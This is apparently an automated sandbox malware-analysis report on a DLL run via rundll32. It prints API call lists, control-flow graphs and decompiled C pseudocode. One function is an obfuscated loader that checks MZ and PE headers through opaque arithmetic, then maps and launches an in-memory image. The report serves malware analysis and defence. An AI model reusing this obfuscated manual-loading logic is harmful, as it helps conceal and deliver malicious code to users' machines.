                                                                                                            • Instruction ID: 1ab9cbaac9cb8a736ff2886ec947831f70add154915b3c09dc4dcc7ccc4cd674
                                                                                                            • Opcode Fuzzy Hash: 2a11ebc9d7fb6060b117caf8eeb261201d5d861bf5ae3b3f6147b5d07e97c54e
                                                                                                            • Instruction Fuzzy Hash: 6C51F4716057429FD710CF68CC887267BE0EB4A364F258A6DD5A5CF2E2D734E889CB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 145 10013ad4-10013adb 146 10013b46-10013b52 HeapDestroy 145->146 147 10013add-10013aed 145->147 148 10013b34-10013b45 HeapFree 147->148 149 10013aef-10013afd 147->149 148->146 150 10013b00-10013b30 VirtualFree * 2 HeapFree 149->150 150->150 151 10013b32-10013b33 150->151 151->148
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013AD4() {
                                                                                                            				int _t2;
                                                                                                            				void* _t8;
                                                                                                            				void* _t14;
                                                                                                            				void** _t15;
                                                                                                            				void* _t21;
                                                                                                            				void* _t23;
                                                                                                            
                                                                                                            				if( *0x10050a64 == 3) {
                                                                                                            					_t8 = 0;
                                                                                                            					_t21 =  *0x10050a48 - _t8; // 0x0
                                                                                                            					if(_t21 > 0) {
                                                                                                            						_t14 =  *0x10050a4c; // 0x0
                                                                                                            						_t15 = _t14 + 0xc;
                                                                                                            						do {
                                                                                                            							VirtualFree( *_t15, 0x100000, 0x4000);
                                                                                                            							VirtualFree( *_t15, 0, 0x8000);
                                                                                                            							HeapFree( *0x10050a60, 0, _t15[1]);
                                                                                                            							_t15 =  &(_t15[5]);
                                                                                                            							_t8 = _t8 + 1;
                                                                                                            							_t23 = _t8 -  *0x10050a48; // 0x0
                                                                                                            						} while (_t23 < 0);
                                                                                                            					}
                                                                                                            					HeapFree( *0x10050a60, 0,  *0x10050a4c);
                                                                                                            				}
                                                                                                            				_t2 = HeapDestroy( *0x10050a60); // executed
                                                                                                            				return _t2;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • VirtualFree.KERNEL32(-0000000C,00100000,00004000,00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B0C
                                                                                                            • VirtualFree.KERNEL32(-0000000C,00000000,00008000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B17
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B24
                                                                                                            • HeapFree.KERNEL32(00000000,?,?,100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B42
                                                                                                            • HeapDestroy.KERNELBASE(100112B9,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10013B4C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Free$Heap$Virtual$Destroy
                                                                                                            • String ID:
                                                                                                            • API String ID: 782257640-0
                                                                                                            • Opcode ID: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                                                            • Instruction ID: ae232e1038543a87835a4795d6aa86e40daf30d89f668916441cffa0c1b4fc0d
                                                                                                            • Opcode Fuzzy Hash: 8f6c8d7fc22e07898a61e37111d0c0b64a3083a977e6fea9273e17b92621faf8
                                                                                                            • Instruction Fuzzy Hash: 81F0493AA00328AFFB21DF15DCC5F0ABB75F741754F258024F6456A4B2C6B36850EB19
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 152 10005260-1000530c 153 10006011-1000601a 152->153 154 10005312-10005361 152->154 154->153 155 10005367-10005409 154->155 155->153 156 1000540f-10005488 155->156 156->153 157 1000548e-100054cb 156->157 157->153 158 100054d1-10005505 157->158 158->153 159 1000550b-10005594 158->159 160 1000559a-100055be 159->160 161 100056bc-100056c2 159->161 163 100055c4-100055d1 160->163 162 100056c8-10005803 GetNativeSystemInfo call 10002bf0 * 2 161->162 162->153 175 10005809-10005914 162->175 165 100055d3-10005602 163->165 166 10005604-10005642 163->166 168 10005644-10005654 165->168 166->168 170 10005656-10005697 168->170 171 10005699 168->171 173 1000569f-100056b4 170->173 171->173 173->163 174 100056ba 173->174 174->162 177 10005a04-10005a9b GetProcessHeap HeapAlloc 175->177 178 1000591a-100059fc 175->178 179 10005ae8-10005bdd call 10002c60 177->179 180 10005a9d-10005ae7 177->180 178->153 185 10005a02 178->185 186 10005be3-10005e5a memcpy call 10002ca0 179->186 187 10006008-1000600e call 10004dd0 179->187 185->177 186->187 193 10005e60-10005ec1 186->193 187->153 194 10005ec7-10005f56 call 10003b80 193->194 195 10005f58 193->195 197 10005f5f-10005f91 call 10003f40 194->197 195->197 197->187 201 10005f93-10005fd6 call 10003570 197->201 203 10005fdb-10005fe0 201->203 203->187 204 10005fe2-10006006 call 10003ad0 203->204 204->187 207 1000601b-10006026 204->207 208 1000602c-10006031 207->208 209 1000610d-1000611d 207->209 210 10006033-100060a4 208->210 211 100060a5-1000610c 208->211
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E10005260() {
                                                                                                            				signed int _t340;
                                                                                                            				signed int _t351;
                                                                                                            				signed int _t354;
                                                                                                            				signed int _t356;
                                                                                                            				signed int _t360;
                                                                                                            				void* _t373;
                                                                                                            				signed int _t385;
                                                                                                            				signed int _t388;
                                                                                                            				signed int _t398;
                                                                                                            				signed int _t403;
                                                                                                            				intOrPtr _t405;
                                                                                                            				void* _t410;
                                                                                                            				signed int _t411;
                                                                                                            				signed int _t412;
                                                                                                            				signed int _t413;
                                                                                                            				signed int _t423;
                                                                                                            				signed int _t425;
                                                                                                            				void* _t433;
                                                                                                            				signed int _t436;
                                                                                                            				signed int _t437;
                                                                                                            				signed int _t438;
                                                                                                            				void* _t441;
                                                                                                            				signed int _t442;
                                                                                                            				signed int _t444;
                                                                                                            				signed int _t448;
                                                                                                            				intOrPtr _t453;
                                                                                                            				signed int _t454;
                                                                                                            				signed int _t463;
                                                                                                            				void* _t467;
                                                                                                            				signed int _t468;
                                                                                                            				signed int _t469;
                                                                                                            				void* _t473;
                                                                                                            				signed int _t474;
                                                                                                            				void* _t475;
                                                                                                            				void* _t476;
                                                                                                            				intOrPtr _t478;
                                                                                                            				signed int _t481;
                                                                                                            				void* _t492;
                                                                                                            				signed int _t498;
                                                                                                            				signed int _t520;
                                                                                                            				intOrPtr _t523;
                                                                                                            				signed int _t532;
                                                                                                            				signed int _t533;
                                                                                                            				signed short* _t542;
                                                                                                            				signed int _t545;
                                                                                                            				signed int _t563;
                                                                                                            				signed int _t571;
                                                                                                            				signed int _t579;
                                                                                                            				signed int _t580;
                                                                                                            				signed int _t583;
                                                                                                            				intOrPtr _t585;
                                                                                                            				signed int _t587;
                                                                                                            				signed int _t590;
                                                                                                            				signed int _t604;
                                                                                                            				signed int _t624;
                                                                                                            				intOrPtr _t636;
                                                                                                            				signed int _t637;
                                                                                                            				signed int _t642;
                                                                                                            				signed int _t665;
                                                                                                            				signed int _t668;
                                                                                                            				signed int _t673;
                                                                                                            				signed int _t691;
                                                                                                            				signed int _t692;
                                                                                                            				signed int _t706;
                                                                                                            				signed int _t707;
                                                                                                            				signed int _t716;
                                                                                                            				signed int _t717;
                                                                                                            				signed int _t722;
                                                                                                            				signed int _t726;
                                                                                                            				signed int _t731;
                                                                                                            				signed int _t732;
                                                                                                            				signed int _t733;
                                                                                                            				signed int _t736;
                                                                                                            				signed int _t738;
                                                                                                            				signed int _t739;
                                                                                                            				signed int _t743;
                                                                                                            				signed int _t752;
                                                                                                            				signed int _t754;
                                                                                                            				signed int _t756;
                                                                                                            				signed int _t759;
                                                                                                            				signed int _t761;
                                                                                                            				signed int _t765;
                                                                                                            				signed int _t766;
                                                                                                            				signed int _t770;
                                                                                                            				signed int _t778;
                                                                                                            				signed int _t780;
                                                                                                            				signed int _t789;
                                                                                                            				signed int _t795;
                                                                                                            				signed int _t836;
                                                                                                            				signed int _t840;
                                                                                                            				signed int _t841;
                                                                                                            				signed int _t853;
                                                                                                            				signed int _t867;
                                                                                                            				signed int _t888;
                                                                                                            				signed int _t890;
                                                                                                            				signed int _t891;
                                                                                                            				signed int _t895;
                                                                                                            				signed int _t900;
                                                                                                            				signed int _t903;
                                                                                                            				signed int _t905;
                                                                                                            				signed int _t907;
                                                                                                            				signed int _t913;
                                                                                                            				signed int _t918;
                                                                                                            				signed int _t921;
                                                                                                            				signed int _t924;
                                                                                                            				signed int _t928;
                                                                                                            				signed int _t930;
                                                                                                            				signed int _t932;
                                                                                                            				signed int _t933;
                                                                                                            				signed int _t934;
                                                                                                            				signed int _t941;
                                                                                                            				intOrPtr* _t951;
                                                                                                            				signed int _t954;
                                                                                                            				signed int _t955;
                                                                                                            				signed int _t956;
                                                                                                            				signed int _t962;
                                                                                                            				signed int _t963;
                                                                                                            				signed int _t970;
                                                                                                            				signed int _t971;
                                                                                                            				signed int _t981;
                                                                                                            				signed int _t988;
                                                                                                            				signed int _t989;
                                                                                                            				signed int _t995;
                                                                                                            				signed int _t1035;
                                                                                                            				signed int _t1041;
                                                                                                            				signed int _t1042;
                                                                                                            				signed int _t1043;
                                                                                                            				signed short _t1049;
                                                                                                            				signed int _t1050;
                                                                                                            				signed int _t1051;
                                                                                                            				signed int _t1064;
                                                                                                            				intOrPtr* _t1066;
                                                                                                            				signed int _t1067;
                                                                                                            				signed int _t1075;
                                                                                                            				signed int _t1076;
                                                                                                            				signed int _t1084;
                                                                                                            				signed int _t1085;
                                                                                                            				signed int _t1086;
                                                                                                            				signed int _t1091;
                                                                                                            				signed int _t1094;
                                                                                                            				signed int _t1097;
                                                                                                            				signed int _t1126;
                                                                                                            				signed int _t1128;
                                                                                                            				signed int _t1132;
                                                                                                            				signed int _t1135;
                                                                                                            				signed int _t1138;
                                                                                                            				signed int _t1153;
                                                                                                            				signed int _t1165;
                                                                                                            				signed int _t1166;
                                                                                                            				signed int _t1167;
                                                                                                            				intOrPtr* _t1168;
                                                                                                            				signed int _t1169;
                                                                                                            				signed int _t1170;
                                                                                                            				signed int _t1174;
                                                                                                            				signed int _t1184;
                                                                                                            				signed int _t1187;
                                                                                                            				signed int _t1200;
                                                                                                            				void* _t1202;
                                                                                                            				signed int _t1227;
                                                                                                            				signed int _t1237;
                                                                                                            				void* _t1248;
                                                                                                            				void* _t1249;
                                                                                                            				void* _t1250;
                                                                                                            				void* _t1251;
                                                                                                            
                                                                                                            				_t691 =  *0x1004b0ec; // 0x0
                                                                                                            				_t340 =  *0x1004b0e4; // 0x0
                                                                                                            				_t981 =  *0x1004b0e0; // 0x0
                                                                                                            				_t932 =  *0x1004b0d8; // 0x0
                                                                                                            				_t795 =  *0x1004b0dc; // 0x0
                                                                                                            				_t933 =  *0x1004b0e8; // 0x0
                                                                                                            				_t4 = _t981 * _t933 + 2; // 0x2
                                                                                                            				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
                                                                                                            				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
                                                                                                            				_t934 =  *0x1004b0e0; // 0x0
                                                                                                            				_t532 =  *0x1004b0d8; // 0x0
                                                                                                            				 *(_t1248 + 0x14) = 0;
                                                                                                            				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
                                                                                                            					L32:
                                                                                                            					return 0;
                                                                                                            				} else {
                                                                                                            					_t988 =  *0x1004b0e0; // 0x0
                                                                                                            					_t533 = _t532 * _t795;
                                                                                                            					_t941 =  *0x1004b0e8; // 0x0
                                                                                                            					_t989 = _t988 * _t691;
                                                                                                            					 *(_t1248 + 0x10) = _t533;
                                                                                                            					 *(_t1248 + 0x30) = _t989;
                                                                                                            					_t542 =  *(_t1248 + 0x5c);
                                                                                                            					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
                                                                                                            						goto L32;
                                                                                                            					} else {
                                                                                                            						_t995 = _t941 * _t691;
                                                                                                            						 *(_t1248 + 0x20) = _t542[0x1e];
                                                                                                            						 *(_t1248 + 0x2c) = _t995;
                                                                                                            						_t545 =  *0x1004b0d8; // 0x0
                                                                                                            						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
                                                                                                            						_t1126 =  *0x1004b0e0; // 0x0
                                                                                                            						_t36 = _t691 + 1; // 0x1
                                                                                                            						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
                                                                                                            							goto L32;
                                                                                                            						} else {
                                                                                                            							_t1128 =  *0x1004b0e8; // 0x0
                                                                                                            							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
                                                                                                            							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
                                                                                                            							 *(_t1248 + 0x18) = _t340 + _t340;
                                                                                                            							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
                                                                                                            							_t1132 =  *0x1004b0e8; // 0x0
                                                                                                            							_t563 =  *0x1004b0d8; // 0x0
                                                                                                            							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
                                                                                                            							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
                                                                                                            								goto L32;
                                                                                                            							} else {
                                                                                                            								_t1135 =  *0x1004b0e0; // 0x0
                                                                                                            								_t1138 =  *0x1004b0e0; // 0x0
                                                                                                            								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
                                                                                                            									goto L32;
                                                                                                            								} else {
                                                                                                            									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
                                                                                                            									_t1035 =  *0x1004b0e0; // 0x0
                                                                                                            									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
                                                                                                            									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
                                                                                                            										goto L32;
                                                                                                            									} else {
                                                                                                            										_t1041 =  *0x1004b0e0; // 0x0
                                                                                                            										_t1042 =  *0x1004b0e8; // 0x0
                                                                                                            										_t1043 =  *0x1004b0e8; // 0x0
                                                                                                            										_t571 =  *0x1004b0d8; // 0x0
                                                                                                            										_t1153 =  *0x1004b0e0; // 0x0
                                                                                                            										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                            										_t579 =  *(_t1248 + 0x18);
                                                                                                            										_t83 = _t795 - 2; // -2
                                                                                                            										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
                                                                                                            										if(_t1049 == 0) {
                                                                                                            											_t580 =  *0x1004b0d8; // 0x0
                                                                                                            											_t1050 =  *0x1004b0e8; // 0x0
                                                                                                            										} else {
                                                                                                            											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
                                                                                                            											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
                                                                                                            											_t673 =  *0x1004b0d8; // 0x0
                                                                                                            											 *(_t1248 + 0x20) = _t1049;
                                                                                                            											_t1086 =  *0x1004b0e8; // 0x0
                                                                                                            											do {
                                                                                                            												_t1237 =  *( *(_t1248 + 0x10) + 4);
                                                                                                            												 *(_t1248 + 0x18) = _t1237;
                                                                                                            												if(_t1237 != 0) {
                                                                                                            													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
                                                                                                            													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
                                                                                                            												} else {
                                                                                                            													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
                                                                                                            													_t1094 =  *0x1004b0e0; // 0x0
                                                                                                            													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
                                                                                                            												}
                                                                                                            												 *(_t1248 + 0x18) = _t1091;
                                                                                                            												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
                                                                                                            													_t673 =  *0x1004b0d8; // 0x0
                                                                                                            												} else {
                                                                                                            													_t1097 =  *0x1004b0e0; // 0x0
                                                                                                            													_t673 =  *0x1004b0d8; // 0x0
                                                                                                            													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
                                                                                                            												}
                                                                                                            												_t1086 =  *0x1004b0e8; // 0x0
                                                                                                            												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
                                                                                                            												_t129 = _t1248 + 0x20;
                                                                                                            												 *_t129 =  *(_t1248 + 0x20) - 1;
                                                                                                            											} while ( *_t129 != 0);
                                                                                                            										}
                                                                                                            										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
                                                                                                            										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
                                                                                                            										_t351 =  *0x1004b0e4; // 0x0
                                                                                                            										_t692 =  *0x1004b0ec; // 0x0
                                                                                                            										_t1165 =  *0x1004b0e8; // 0x0
                                                                                                            										_t1051 =  *0x1004b0dc; // 0x0
                                                                                                            										_t583 =  *0x1004b0e0; // 0x0
                                                                                                            										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
                                                                                                            										_t354 =  *0x1004b0d8; // 0x0
                                                                                                            										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
                                                                                                            										_t143 = _t354 + 2; // 0x2
                                                                                                            										_t356 =  *0x1004b0e4; // 0x0
                                                                                                            										_t360 =  *0x1004b0ec; // 0x0
                                                                                                            										_t146 = _t1051 + 0xa; // 0xa
                                                                                                            										_t706 =  *0x1004b0d8; // 0x0
                                                                                                            										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
                                                                                                            										_t707 = _t706 * _t1051;
                                                                                                            										 *(_t1248 + 0x14) = _t707;
                                                                                                            										_t1166 =  *0x1004b0ec; // 0x0
                                                                                                            										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
                                                                                                            										_t1167 =  *0x1004b0d8; // 0x0
                                                                                                            										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
                                                                                                            										_t1249 = _t1248 + 8;
                                                                                                            										if( *(_t1248 + 0x20) != _t373) {
                                                                                                            											goto L32;
                                                                                                            										} else {
                                                                                                            											_t716 =  *0x1004b0ec; // 0x0
                                                                                                            											 *(_t1249 + 0x20) = _t716 * _t1167;
                                                                                                            											_t165 = _t1051 + 2; // 0x3
                                                                                                            											_t717 =  *0x1004b0e8; // 0x0
                                                                                                            											_t166 = _t1167 + 1; // 0x1
                                                                                                            											_t385 =  *0x1004b0e4; // 0x0
                                                                                                            											_t388 =  *0x1004b0ec; // 0x0
                                                                                                            											_t398 =  *0x1004b0e4; // 0x0
                                                                                                            											_t403 =  *0x1004b0ec; // 0x0
                                                                                                            											_t722 =  *0x1004b0e8; // 0x0
                                                                                                            											_t182 = _t403 + 1; // 0x1
                                                                                                            											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
                                                                                                            											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
                                                                                                            											_t1250 = _t1249 + 0x14;
                                                                                                            											_t585 = _t405;
                                                                                                            											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
                                                                                                            											if(_t585 != 0) {
                                                                                                            												L21:
                                                                                                            												_t836 =  *0x1004b0e8; // 0x0
                                                                                                            												_t726 =  *0x1004b0ec; // 0x0
                                                                                                            												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
                                                                                                            												_t840 =  *0x1004b0d8; // 0x0
                                                                                                            												_t1064 =  *0x1004b0e4; // 0x0
                                                                                                            												_t841 =  *0x1004b0e8; // 0x0
                                                                                                            												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
                                                                                                            												_t731 =  *0x1004b0e8; // 0x0
                                                                                                            												_t411 =  *0x1004b0e0; // 0x0
                                                                                                            												_t412 =  *0x1004b0ec; // 0x0
                                                                                                            												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
                                                                                                            												if(_t1066 != 0) {
                                                                                                            													 *((intOrPtr*)(_t1066 + 4)) = _t585;
                                                                                                            													_t413 =  *0x1004b0e0; // 0x0
                                                                                                            													_t732 =  *0x1004b0ec; // 0x0
                                                                                                            													_t224 = _t732 * 2; // -268738780
                                                                                                            													_t853 =  *0x1004b0e8; // 0x0
                                                                                                            													_t733 =  *0x1004b0d8; // 0x0
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
                                                                                                            													asm("sbb eax, eax");
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
                                                                                                            													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
                                                                                                            													_t423 =  *0x1004b0e8; // 0x0
                                                                                                            													_t736 =  *0x1004b0e4; // 0x0
                                                                                                            													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
                                                                                                            													_t1169 =  *0x1004b0ec; // 0x0
                                                                                                            													_t425 =  *0x1004b0e4; // 0x0
                                                                                                            													_t738 =  *0x1004b0e0; // 0x0
                                                                                                            													_t587 =  *0x1004b0d8; // 0x0
                                                                                                            													_t739 =  *0x1004b0e8; // 0x0
                                                                                                            													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
                                                                                                            													_t867 =  *0x1004b0e0; // 0x0
                                                                                                            													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
                                                                                                            													_t1251 = _t1250 + 8;
                                                                                                            													if(_t433 == 0) {
                                                                                                            														L31:
                                                                                                            														_push(_t1066);
                                                                                                            														E10004DD0();
                                                                                                            														goto L32;
                                                                                                            													} else {
                                                                                                            														_t743 =  *0x1004b0e0; // 0x0
                                                                                                            														_t436 =  *0x1004b0e8; // 0x0
                                                                                                            														_t437 =  *0x1004b0dc; // 0x0
                                                                                                            														_t752 =  *0x1004b0e0; // 0x0
                                                                                                            														_t1170 =  *0x1004b0e4; // 0x0
                                                                                                            														_t438 =  *0x1004b0e8; // 0x0
                                                                                                            														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
                                                                                                            														_t754 =  *0x1004b0dc; // 0x0
                                                                                                            														_t590 =  *0x1004b0d8; // 0x0
                                                                                                            														_t1174 =  *0x1004b0d8; // 0x0
                                                                                                            														 *(_t1251 + 0x34) = _t441;
                                                                                                            														_t442 =  *0x1004b0e8; // 0x0
                                                                                                            														_t888 =  *0x1004b0e4; // 0x0
                                                                                                            														_t444 =  *0x1004b0ec; // 0x0
